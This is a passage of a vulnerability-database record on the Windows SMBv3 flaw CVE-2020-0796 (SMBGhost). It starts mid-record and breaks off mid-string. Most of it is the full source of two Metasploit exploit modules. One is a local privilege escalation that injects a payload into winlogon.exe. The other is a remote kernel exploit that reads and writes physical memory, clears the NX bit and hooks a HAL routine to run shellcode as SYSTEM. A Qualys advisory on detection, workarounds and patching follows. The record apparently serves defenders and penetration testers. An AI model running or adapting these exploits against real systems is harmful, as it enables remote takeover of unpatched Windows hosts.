"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T14:14:25", "id": "CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F", "href": "https://www.carbonblack.com/2020/03/17/threat-analysis-cve-2020-0796-eternaldarkness-ghostsmb/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-01-02T08:56:39", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.\n", "cvss3": {}, "published": "2020-04-02T21:22:00", "type": "metasploit", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0796_SMBGHOST-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2020_0796_smbghost/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. 
This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit\n 'Manuel Blanco Paraj\u00f3n', # original LPE exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)\n print_error('The exploit only supports Windows 10 versions 1903 - 1909')\n return CheckCode::Safe\n end\n\n disable_compression = registry_getvaldata('HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters', 'DisableCompression')\n if !disable_compression.nil? 
&& disable_compression != 0\n print_error('The exploit requires compression to be enabled')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Reflectively injecting the exploit DLL and executing it...')\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2020_0796_smbghost.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-02T08:56:38", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. 
Exploitation can take a few minutes as the necessary data is gathered.\n", "cvss3": {}, "published": "2021-04-09T18:15:05", "type": "metasploit", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2022-03-21T12:47:39", "id": "MSF:EXPLOIT-WINDOWS-SMB-CVE_2020_0796_SMBGHOST-", "href": "https://www.rapid7.com/db/modules/exploit/windows/smb/cve_2020_0796_smbghost/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n prepend Msf::Exploit::Remote::AutoCheck\n\n LZNT1 = RubySMB::Compression::LZNT1\n\n # KUSER_SHARED_DATA offsets, these are defined by the module and are therefore target independent\n KSD_VA_MAP = 0x800\n KSD_VA_PMDL = 0x900\n KSD_VA_SHELLCODE = 0x950 # needs to be the highest offset for #cleanup\n\n MAX_READ_RETRIES = 5\n WRITE_UNIT = 0xd0\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code\n in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. 
Exploitation\n can take a few minutes as the necessary data is gathered.\n },\n 'Author' => [\n 'hugeh0ge', # Ricerca Security research, detailed technique description\n 'chompie1337', # PoC on which this module is based\n 'Spencer McIntyre', # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html' ],\n [ 'URL', 'https://github.com/chompie1337/SMBGhost_RCE_PoC' ],\n # the rest are not cve-2020-0796 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],\n [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],\n [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],\n [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]\n ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 10\n },\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => 600,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' => [\n [\n 'Windows 10 v1903-1909 x64',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'OverflowSize' => 0x1100,\n 'LowStubFingerprint' => 0x1000600e9,\n 'KuserSharedData' => 0xfffff78000000000,\n # Offset(From,To) => Bytes\n 'Offset(HalpInterruptController,HalpApicRequestInterrupt)' => 0x78,\n 'Offset(LowStub,SelfVA)' => 0x78,\n 'Offset(LowStub,PML4)' => 0xa0,\n 'Offset(SrvnetBufferHdr,pMDL1)' => 0x38,\n 'Offset(SrvnetBufferHdr,pNetRawBuffer)' => 0x18\n }\n ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 
'RelatedModules' => [ 'exploit/windows/local/cve_2020_0796_smbghost' ],\n 'SideEffects' => []\n }\n )\n )\n register_options([Opt::RPORT(445),])\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true])\n ])\n end\n\n def check\n begin\n client = RubySMB::Client.new(\n RubySMB::Dispatcher::Socket.new(connect(false)),\n username: '',\n password: '',\n smb1: false,\n smb2: false,\n smb3: true\n )\n protocol = client.negotiate\n client.disconnect!\n rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError\n return CheckCode::Unknown\n rescue Errno::ECONNRESET\n return CheckCode::Unknown\n rescue ::Exception => e # rubocop:disable Lint/RescueException\n vprint_error(\"#{rhost}: #{e.class} #{e}\")\n return CheckCode::Unknown\n end\n\n return CheckCode::Safe unless protocol == 'SMB3'\n return CheckCode::Safe unless client.dialect == '0x0311'\n\n lznt1_algorithm = RubySMB::SMB2::CompressionCapabilities::COMPRESSION_ALGORITHM_MAP.key('LZNT1')\n return CheckCode::Safe unless client.server_compression_algorithms.include?(lznt1_algorithm)\n\n CheckCode::Detected\n end\n\n def smb_negotiate\n # need a custom negotiate function because the responses will be corrupt while reading memory\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n\n packet = RubySMB::SMB2::Packet::NegotiateRequest.new\n packet.client_guid = SecureRandom.random_bytes(16)\n packet.set_dialects((RubySMB::Client::SMB2_DIALECT_DEFAULT + RubySMB::Client::SMB3_DIALECT_DEFAULT).map { |d| d.to_i(16) })\n\n packet.capabilities.large_mtu = 1\n packet.capabilities.encryption = 1\n\n nc = RubySMB::SMB2::NegotiateContext.new(\n context_type: RubySMB::SMB2::NegotiateContext::SMB2_PREAUTH_INTEGRITY_CAPABILITIES\n )\n nc.data.hash_algorithms << RubySMB::SMB2::PreauthIntegrityCapabilities::SHA_512\n nc.data.salt = \"\\x00\" * 32\n packet.add_negotiate_context(nc)\n\n nc = RubySMB::SMB2::NegotiateContext.new(\n context_type: 
RubySMB::SMB2::NegotiateContext::SMB2_COMPRESSION_CAPABILITIES\n )\n nc.data.flags = 1\n nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZNT1\n packet.add_negotiate_context(nc)\n\n dispatcher.send_packet(packet)\n dispatcher\n end\n\n def write_primitive(data, addr)\n dispatcher = smb_negotiate\n dispatcher.tcp_socket.get_once # disregard the response\n\n uncompressed_data = rand(0x41..0x5a).chr * (target['OverflowSize'] - data.length)\n uncompressed_data << \"\\x00\" * target['Offset(SrvnetBufferHdr,pNetRawBuffer)']\n uncompressed_data << [ addr ].pack('Q<')\n\n pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(\n original_compressed_segment_size: 0xffffffff,\n compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,\n offset: data.length,\n compressed_data: (data + LZNT1.compress(uncompressed_data)).bytes\n )\n dispatcher.send_packet(pkt)\n dispatcher.tcp_socket.close\n end\n\n def write_srvnet_buffer_hdr(data, offset)\n dispatcher = smb_negotiate\n dispatcher.tcp_socket.get_once # disregard the response\n\n dummy_data = rand(0x41..0x5a).chr * (target['OverflowSize'] + offset)\n pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(\n original_compressed_segment_size: 0xffffefff,\n compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,\n offset: dummy_data.length,\n compressed_data: (dummy_data + CorruptLZNT1.compress(data)).bytes\n )\n dispatcher.send_packet(pkt)\n dispatcher.tcp_socket.close\n end\n\n def read_primitive(phys_addr)\n value = @memory_cache[phys_addr]\n return value unless value.nil?\n\n vprint_status(\"Reading from physical memory at index: 0x#{phys_addr.to_s(16).rjust(16, '0')}\")\n fake_mdl = MDL.new(\n mdl_size: 0x48,\n mdl_flags: 0x5018,\n mapped_system_va: (target['KuserSharedData'] + KSD_VA_MAP),\n start_va: ((target['KuserSharedData'] + KSD_VA_MAP) & ~0xfff),\n byte_count: 600,\n byte_offset: ((phys_addr & 0xfff) + 0x4)\n )\n phys_addr_enc = (phys_addr & 
0xfffffffffffff000) >> 12\n\n (MAX_READ_RETRIES * 2).times do |try|\n write_primitive(fake_mdl.to_binary_s + ([ phys_addr_enc ] * 3).pack('Q<*'), (target['KuserSharedData'] + KSD_VA_PMDL))\n write_srvnet_buffer_hdr([(target['KuserSharedData'] + KSD_VA_PMDL)].pack('Q<'), target['Offset(SrvnetBufferHdr,pMDL1)'])\n\n MAX_READ_RETRIES.times do |_|\n dispatcher = smb_negotiate\n blob = dispatcher.tcp_socket.get_once\n dispatcher.tcp_socket.close\n next '' if blob.nil?\n next if blob[4..7] == \"\\xfeSMB\".b\n\n @memory_cache[phys_addr] = blob\n return blob\n end\n sleep try**2\n end\n\n fail_with(Failure::Unknown, 'Failed to read physical memory')\n end\n\n def find_low_stub\n common = [0x13000].to_enum # try the most common value first\n all = (0x1000..0x100000).step(0x1000)\n (common + all).each do |index|\n buff = read_primitive(index)\n entry = buff.unpack('Q<').first\n next unless (entry & 0xffffffffffff00ff) == (target['LowStubFingerprint'] & 0xffffffffffff00ff)\n\n lowstub_va = buff[target['Offset(LowStub,SelfVA)']...(target['Offset(LowStub,SelfVA)'] + 8)].unpack('Q<').first\n print_status(\"Found low stub at physical address 0x#{index.to_s(16).rjust(16, '0')}, virtual address 0x#{lowstub_va.to_s(16).rjust(16, '0')}\")\n pml4 = buff[target['Offset(LowStub,PML4)']...(target['Offset(LowStub,PML4)'] + 8)].unpack('Q<').first\n print_status(\"Found PML4 at 0x#{pml4.to_s(16).rjust(16, '0')} \" + { 0x1aa000 => '(BIOS)', 0x1ad000 => '(UEFI)' }.fetch(pml4, ''))\n\n phal_heap = lowstub_va & 0xffffffffffff0000\n print_status(\"Found HAL heap at 0x#{phal_heap.to_s(16).rjust(16, '0')}\")\n\n return { pml4: pml4, phal_heap: phal_heap }\n end\n\n fail_with(Failure::Unknown, 'Failed to find the low stub')\n end\n\n def find_pml4_selfref(pointers)\n search_len = 0x1000\n index = pointers[:pml4]\n\n while search_len > 0\n buff = read_primitive(index)\n buff = buff[0...-(buff.length % 8)]\n buff.unpack('Q<*').each_with_index do |entry, i|\n entry &= 0xfffff000\n next unless entry == 
pointers[:pml4]\n\n selfref = ((index + (i * 8)) & 0xfff) >> 3\n pointers[:pml4_selfref] = selfref\n print_status(\"Found PML4 self-reference entry at 0x#{selfref.to_s(16).rjust(4, '0')}\")\n return pointers\n end\n search_len -= [buff.length, 8].max\n index += [buff.length, 8].max\n end\n\n fail_with(Failure::Unknown, 'Failed to leak the PML4 self reference')\n end\n\n def get_phys_addr(pointers, va_addr)\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\n\n pml4e = pointers[:pml4] + pml4_index * 8\n pdpt_buff = read_primitive(pml4e)\n\n pdpt = pdpt_buff.unpack('Q<').first & 0xfffff000\n pdpte = pdpt + pdpt_index * 8\n pdt_buff = read_primitive(pdpte)\n\n pdt = pdt_buff.unpack('Q<').first & 0xfffff000\n pdte = pdt + pdt_index * 8\n pt_buff = read_primitive(pdte)\n\n pt = pt_buff.unpack('Q<').first\n unless pt & (1 << 7) == 0\n return (pt & 0xfffff000) + (pt_index & 0xfff) * 0x1000 + (va_addr & 0xfff)\n end\n\n pt &= 0xfffff000\n pte = pt + pt_index * 8\n pte_buff = read_primitive(pte)\n (pte_buff.unpack('Q<').first & 0xfffff000) + (va_addr & 0xfff)\n end\n\n def disable_nx(pointers, addr)\n lb = (0xffff << 48) | (pointers[:pml4_selfref] << 39)\n ub = ((0xffff << 48) | (pointers[:pml4_selfref] << 39) + 0x8000000000 - 1) & 0xfffffffffffffff8\n pte_va = ((addr >> 9) | lb) & ub\n\n phys_addr = get_phys_addr(pointers, pte_va)\n orig_val = read_primitive(phys_addr).unpack1('Q<')\n overwrite_val = orig_val & ((1 << 63) - 1)\n write_primitive([ overwrite_val ].pack('Q<'), pte_va)\n { pte_va: pte_va, original: orig_val }\n end\n\n def search_hal_heap(pointers)\n va_cursor = pointers[:phal_heap]\n end_va = va_cursor + 0x20000\n\n while va_cursor < end_va\n phys_addr = get_phys_addr(pointers, va_cursor)\n buff = read_primitive(phys_addr)\n buff = buff[0...-(buff.length % 8)]\n values = buff.unpack('Q<*')\n 
window_size = 8 # using a sliding window to fingerprint the memory\n 0.upto(values.length - window_size) do |i| # TODO: if the heap structure exists over two pages, this will break\n va = va_cursor + (i * 8)\n window = values[i...(i + window_size)]\n next unless window[0...3].all? { |value| value & 0xfffff00000000000 == 0xfffff00000000000 }\n next unless window[4...8].all? { |value| value & 0xffffff0000000000 == 0xfffff80000000000 }\n next unless window[3].between?(0x20, 0x40)\n next unless (window[0] - window[2]).between?(0x80, 0x180)\n\n phalp_ari = read_primitive(get_phys_addr(pointers, va) + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']).unpack('Q<').first\n next if read_primitive(get_phys_addr(pointers, phalp_ari))[0...8] != \"\\x48\\x89\\x6c\\x24\\x20\\x56\\x41\\x54\" # mov qword ptr [rsp+20h], rbp; push rsi; push r12\n\n # looks legit (TM), lets hope for the best\n # use WinDBG to validate the hal!HalpInterruptController value manually\n # 0: kd> dq poi(hal!HalpInterruptController) L1\n pointers[:pHalpInterruptController] = va\n print_status(\"Found hal!HalpInterruptController at 0x#{va.to_s(16).rjust(16, '0')}\")\n\n # use WinDBG to validate the hal!HalpApicRequestInterrupt value manually\n # 0: kd> dq u poi(poi(hal!HalpInterruptController)+78) L1\n pointers[:pHalpApicRequestInterrupt] = phalp_ari\n print_status(\"Found hal!HalpApicRequestInterrupt at 0x#{phalp_ari.to_s(16).rjust(16, '0')}\")\n return pointers\n end\n\n va_cursor += buff.length\n end\n fail_with(Failure::Unknown, 'Failed to leak the address of hal!HalpInterruptController')\n end\n\n def build_shellcode(pointers)\n source = File.read(File.join(Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2020-0796', 'RCE', 'kernel_shellcode.asm'), mode: 'rb')\n edata = Metasm::Shellcode.assemble(Metasm::X64.new, source).encoded\n user_shellcode = payload.encoded\n edata.fixup 'PHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpApicRequestInterrupt]\n edata.fixup 
'PPHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']\n edata.fixup 'USER_SHELLCODE_SIZE' => user_shellcode.length\n edata.data + user_shellcode\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute this module? There is a high probability that even when the exploit is\n successful the remote target will crash within about 90 minutes.\n\n Disable the DefangedMode option to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n fail_with(Failure::BadConfig, \"Incompatible payload: #{datastore['PAYLOAD']} (must be x64)\") unless payload.arch.include? ARCH_X64\n @memory_cache = {}\n @shellcode_length = 0\n pointers = find_low_stub\n pointers = find_pml4_selfref(pointers)\n pointers = search_hal_heap(pointers)\n\n @nx_info = disable_nx(pointers, target['KuserSharedData'])\n print_status('KUSER_SHARED_DATA PTE NX bit cleared!')\n\n shellcode = build_shellcode(pointers)\n vprint_status(\"Transferring #{shellcode.length} bytes of shellcode...\")\n @shellcode_length = shellcode.length\n write_bytes = 0\n while write_bytes < @shellcode_length\n write_sz = [WRITE_UNIT, @shellcode_length - write_bytes].min\n write_primitive(shellcode[write_bytes...(write_bytes + write_sz)], (target['KuserSharedData'] + KSD_VA_SHELLCODE) + write_bytes)\n write_bytes += write_sz\n end\n vprint_status('Transfer complete, hooking hal!HalpApicRequestInterrupt to trigger execution...')\n write_primitive([(target['KuserSharedData'] + KSD_VA_SHELLCODE)].pack('Q<'), pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)'])\n end\n\n def cleanup\n return unless @memory_cache&.present?\n\n if @nx_info&.present?\n print_status('Restoring the KUSER_SHARED_DATA PTE NX bit...')\n write_primitive([ @nx_info[:original] ].pack('Q<'), @nx_info[:pte_va])\n end\n\n # need to restore the contents of 
KUSER_SHARED_DATA to zero to avoid a bugcheck\n vprint_status('Cleaning up the contents of KUSER_SHARED_DATA...')\n start_va = target['KuserSharedData'] + KSD_VA_MAP - WRITE_UNIT\n end_va = target['KuserSharedData'] + KSD_VA_SHELLCODE + @shellcode_length\n (start_va..end_va).step(WRITE_UNIT).each do |cursor|\n write_primitive(\"\\x00\".b * [WRITE_UNIT, end_va - cursor].min, cursor)\n end\n end\n\n module CorruptLZNT1\n def self.compress(buf, chunk_size: 0x1000)\n out = ''\n until buf.empty?\n chunk = buf[0...chunk_size]\n compressed = LZNT1.compress_chunk(chunk)\n\n # always use the compressed chunk, even if it's larger\n out << [ 0xb000 | (compressed.length - 1) ].pack('v')\n out << compressed\n\n buf = buf[chunk_size..]\n break if buf.nil?\n end\n\n out << [ 0x1337 ].pack('v')\n out\n end\n end\n\n class MDL < BinData::Record\n # https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_MDL\n endian :little\n uint64 :next_mdl\n uint16 :mdl_size\n uint16 :mdl_flags\n uint16 :allocation_processor_number\n uint16 :reserved\n uint64 :process\n uint64 :mapped_system_va\n uint64 :start_va\n uint32 :byte_count\n uint32 :byte_offset\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2020-03-20T19:37:53", "description": "This month's [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Microsoft disclosed a remote code execution vulnerability in SMB 3.1.1 (v3) protocol. Even though initial release of the Patch Tuesday did not mention this vulnerability, details of the issue (CVE-2020-0796) were published accidentally on another security vendor\u2019s blog. 
Microsoft published [security advisory ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) and [technical guidance](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) soon after the accidental disclosure of the vulnerability.\n\n**UPDATE March 12, 2020**: Microsoft updated [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) to include CVE-2020-0796 and released patches for affected Windows systems.\n\n### The Vulnerability\n\nA critical remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 protocol handles certain requests. An unauthenticated attacker could exploit the vulnerability to execute arbitrary code on the SMB server by sending a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\n\n**Affected Operating Systems**\n\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n\nMicrosoft released patches and has provided workarounds in a [security advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005>): disable SMBv3 compression and block TCP port 445 on client computers and firewalls to prevent attackers from exploiting the vulnerability.\n\n###### Exploits/PoC:\n\n**Update**: There were no reports of active exploitation or a PoC available in the public domain at the time of the initial release of this post. 
\nOn March 12, [Kryptos Logic](<https://twitter.com/kryptoslogic/status/1238057276738592768>) published a proof-of-concept demonstrating the use of exploit code to crash vulnerable hosts (Denial of Service). \nOn March 13, a PoC was published on [GitHub](<https://github.com/eerykitty/CVE-2020-0796-PoC>) that explained how \"CVE-2020-0796 is caused by a lack of bounds checking in offset size, which is directly passed to several subroutines. Passing a large value causes buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.\"\n\nSystems with port 445 exposed to the Internet are at high risk for this vulnerability.\n\n### Detecting CVE-2020-0796 with Qualys VM\n\nQualys has issued QID 91614 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that covers CVE-2020-0796 across all impacted operating systems. This QID will be included in signature version VULNSIGS-2.4.837-4, and requires authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). Cloud Agents will automatically receive this new QID as part of manifest version 2.4.837.4-3. Details of the detection are also available at [Microsoft Security Alert: March 10, 2020](<https://www.qualys.com/research/security-alerts/2020-03-10/microsoft>).\n\n_QID 91614: Microsoft Guidance for Disabling SMBv3 Compression Not Applied (ADV200005)_\n\nThis QID checks whether SMBv3 is enabled on the host and whether the following workaround has not been applied -\n\n_\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\"; \nDisableCompression -Type DWORD -Value 1_\n\n**Update**: Qualys released QID 91616 to check for patches applied for CVE-2020-0796 across all impacted operating systems using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). 
All new changes are included in signature version VULNSIGS-2.4.841-3.\n\nQID 91616: Microsoft Windows SMBv3 Compression Remote Code Execution Vulnerability (KB4551762)\n\nDetails on Qualys QIDs 91614 and 91616:\n\nIf you have applied neither the SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch nor the SMBv3 workaround:\n\nQIDs 91614 and 91616 will be posted in the scan results.\n\nIf you have applied the SMBv3 workaround, but the SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch is not applied on the host:\n\nQID 91616 will be posted in the scan results.\n\nIf the SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch is applied on the host:\n\nNo QID will be posted in the scan results.\n\nAlong with the two confirmed vulnerability QIDs, Qualys also released the following IG QID to help customers track assets on which they have the mitigation applied. 
This QID can be detected via remote unauthenticated and authenticated scans or via Qualys Cloud Agent.\n\n_QID 48086: Microsoft Server Message Block (SMBv3) Compression Disabled_\n\nYou can search within the [VM Dashboard](<https://discussions.qualys.com/docs/DOC-6446-dashboard-toolbox-new-vulnerability-management-vm-dashboard-beta>) by using the following QQL queries:\n\n_vulnerabilities.vulnerability.cveIds:CVE-2020-0796_ \n_vulnerabilities.vulnerability.qid:91614_\n\n### Detection Dashboard\n\nYou can also track all hosts impacted by the CVE-2020-0796 vulnerability in your environment with the [Microsoft RCE SMBv3 Vulnerability Dashboard](<https://discussions.qualys.com/docs/DOC-7092-dashboard-toolbox-vm-dashboard-microsoft-rce-smbv3-advisory-cve-2020-0796>), which leverages data in your Qualys Vulnerability Management subscription, as shown below:\n\n### Qualys Threat Protection\n\nQualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>). This helps accelerate identification and tracking of this vulnerability.\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability.\n\n### Workaround\n\n * **Disable SMBv3 compression**\n\nYou can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below -\n\n_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_\n\n * **Block TCP port 445 at the enterprise perimeter firewall**\n\nTCP port 445 is used to initiate a connection with the affected component. 
Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability.\n\n### Remediation\n\nCustomers should install patch updates [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) for affected operating systems to be protected from this vulnerability.", "cvss3": {}, "published": "2020-03-11T23:38:37", "type": "qualysblog", "title": "Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T23:38:37", "id": "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T19:36:24", "description": "This month\u2019s [Patch 